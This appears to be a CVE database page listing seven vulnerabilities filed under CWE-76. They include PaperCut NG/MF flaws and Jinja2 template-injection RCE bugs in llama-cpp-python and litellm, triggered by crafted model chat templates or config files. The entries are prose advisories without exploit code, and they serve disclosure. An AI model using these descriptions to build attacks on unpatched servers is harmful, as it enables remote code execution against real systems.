Vulnerabilities (CVE)

Filtered by CWE-76
Total 7 CVE
CVE Vendors Products Updated CVSS v2 CVSS v3
CVE-2024-1883 2024-09-26 N/A 6.3 MEDIUM
This is a reflected cross site scripting vulnerability in the PaperCut NG/MF application server. An attacker can exploit this weakness by crafting a malicious URL that contains a script. When an unsuspecting user clicks on this malicious link, it could potentially lead to limited loss of confidentiality, integrity or availability.
CVE-2024-1882 2024-09-26 N/A 7.2 HIGH
This vulnerability allows an already authenticated admin user to create a malicious payload that could be leveraged for remote code execution on the server hosting the PaperCut NG/MF application server.
CVE-2024-1221 2024-09-26 N/A 3.1 LOW
This vulnerability potentially allows files on a PaperCut NG/MF server to be exposed using a specifically formed payload against the impacted API endpoint. The attacker must carry out some reconnaissance to gain knowledge of a system token. This CVE only affects Linux and macOS PaperCut NG/MF servers.
CVE-2024-4897 2024-07-02 N/A 8.4 HIGH
parisneo/lollms-webui, in its latest version, is vulnerable to remote code execution due to an insecure dependency on llama-cpp-python version llama_cpp_python-0.2.61+cpuavx2-cp311-cp311-manylinux_2_31_x86_64. The vulnerability arises from the application's 'binding_zoo' feature, which allows attackers to upload and interact with a malicious model file hosted on hugging-face, leading to remote code execution. The issue is linked to a known vulnerability in llama-cpp-python, CVE-2024-34359, which has not been patched in lollms-webui as of commit b454f40a. The vulnerability is exploitable through the application's handling of model files in the 'bindings_zoo' feature, specifically when processing gguf format model files.
CVE-2024-34359 2024-05-14 N/A 9.6 CRITICAL
llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depends on class `Llama` in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor built in the `Llama` takes several parameters to configure the loading and running of the model. Other than `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from targeted `.gguf` 's Metadata and furtherly parses it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. Nevertheless, `Jinja2ChatFormatter` parse the `chat template` within the Metadate with sandbox-less `jinja2.Environment`, which is furthermore rendered in `__call__` to construct the `prompt` of interaction. This allows `jinja2` Server Side Template Injection which leads to remote code execution by a carefully constructed payload.
CVE-2024-2952 2024-04-15 N/A 9.8 CRITICAL
BerriAI/litellm is vulnerable to Server-Side Template Injection (SSTI) via the `/completions` endpoint. The vulnerability arises from the `hf_chat_template` method processing the `chat_template` parameter from the `tokenizer_config.json` file through the Jinja template engine without proper sanitization. Attackers can exploit this by crafting malicious `tokenizer_config.json` files that execute arbitrary code on the server.
CVE-2023-1149 1 Btcpayserver 1 Btcpay Server 2024-02-28 N/A 5.4 MEDIUM
Improper Neutralization of Equivalent Special Elements in GitHub repository btcpayserver/btcpayserver prior to 1.8.0.